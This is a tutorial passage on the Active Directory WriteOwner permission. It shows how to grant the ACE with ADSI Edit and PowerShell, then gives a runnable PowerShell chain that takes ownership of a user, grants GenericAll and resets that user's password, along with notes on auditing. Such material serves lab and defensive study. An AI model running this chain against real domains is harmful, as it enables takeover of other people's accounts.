WriteOwner

WriteOwner lets us change the owner of the object to a principal we control. Because the owner of an AD object implicitly holds the right to modify its DACL (WriteDacl), once we own it we can grant ourselves GenericAll or GenericWrite, so in practice WriteOwner is as good as full control over the object.

ADSI Edit

Same as with the other ACEs: open ADSI Edit and browse to your target account, in my case a.king. Right-click it, go to the Security tab and click Advanced. Add the principal you want to grant this privilege to and tick Modify owner. I'll use Infrastructure Managers.

PowerShell

As mentioned previously, this method is less reliable.

Import-Module ActiveDirectory   # provides Get-ADGroup/Get-ADUser and the AD: drive used by Get-ACL/Set-ACL
$MyAdmin = (Get-ADGroup "Infrastructure Managers").SID   # principal that will receive WriteOwner
$MyUser = Get-ADUser a.king                               # target object
$MyDistinguishedName = $MyUser.DistinguishedName
$MyDistinguishedNameAD = "AD:$MyDistinguishedName"        # path of the object in the AD: PSDrive
$MyACL = Get-ACL $MyDistinguishedNameAD
$MyADRights = [System.DirectoryServices.ActiveDirectoryRights] "WriteOwner" # change to the preferred ACE
$MyType = [System.Security.AccessControl.AccessControlType] "Allow"
$MyInheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
$MyACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $MyAdmin,$MyADRights,$MyType,$MyInheritanceType
$MyACL.AddAccessRule($MyACE)
Set-ACL -AclObject $MyACL $MyDistinguishedNameAD
# Verify. ActiveDirectoryRights is a flags enum (an ACE may read "WriteOwner, WriteDacl"), so match on the name instead of comparing for equality
(Get-ACL "AD:$((Get-ADUser -Identity 'a.king').DistinguishedName)").Access | Select-Object IdentityReference, AccessControlType, ActiveDirectoryRights | Where-Object { $_.ActiveDirectoryRights -match "WriteOwner" }
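The following is an added example, not code from the original page, showing the attacker side of the ACE configured above: a session running as a member of Infrastructure Managers takes ownership of a.king, then uses the owner's implicit WriteDacl to add a GenericAll ACE and reset the password. It assumes the ActiveDirectory module is installed, the domain controller is reachable, and the WriteOwner ACE has already been applied; the variable names are mine.

```powershell
# Added example (not from the original page): abusing WriteOwner on a.king from a session
# running as a member of Infrastructure Managers, after the WriteOwner ACE has been applied.
# Assumes the ActiveDirectory module is installed and the domain controller is reachable.
Import-Module ActiveDirectory

$TargetPath = "AD:$((Get-ADUser -Identity 'a.king').DistinguishedName)"

# The new owner is the current user rather than the group: without SeRestorePrivilege you can
# only assign ownership to yourself (or to a group that carries the owner attribute in your token).
$Me = [System.Security.Principal.WindowsIdentity]::GetCurrent().User

# Step 1 - WriteOwner: replace the owner in the object's security descriptor
$Acl = Get-Acl -Path $TargetPath
$Acl.SetOwner($Me)
Set-Acl -Path $TargetPath -AclObject $Acl

# Step 2 - the owner implicitly holds WriteDacl, so add a GenericAll ACE for ourselves
$Acl = Get-Acl -Path $TargetPath
$Ace = [System.DirectoryServices.ActiveDirectoryAccessRule]::new(
    $Me,
    [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
    [System.Security.AccessControl.AccessControlType]::Allow,
    [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None)
$Acl.AddAccessRule($Ace)
Set-Acl -Path $TargetPath -AclObject $Acl

# Step 3 - confirm the new owner and the GenericAll entry
$Acl = Get-Acl -Path $TargetPath
"Owner is now: $($Acl.Owner)"
$Acl.Access |
    Where-Object { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $Me } |
    Select-Object IdentityReference, AccessControlType, ActiveDirectoryRights

# Step 4 - use the control GenericAll gives us, for example a password reset on the target
Set-ADAccountPassword -Identity 'a.king' -Reset -NewPassword (Read-Host -AsSecureString 'New password for a.king')
```

Two caveats when running this. If the target's DACL contains an ACE for the OWNER RIGHTS well-known SID (S-1-3-4), that ACE replaces the owner's implicit ReadControl/WriteDacl, so step 2 can fail even though step 1 succeeded. And the ownership change and the new ACE both modify nTSecurityDescriptor, which is logged on the domain controller as event 5136 when directory service change auditing is enabled, so expect defenders to see the whole chain, not just the password reset.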

Written by ruycr4ft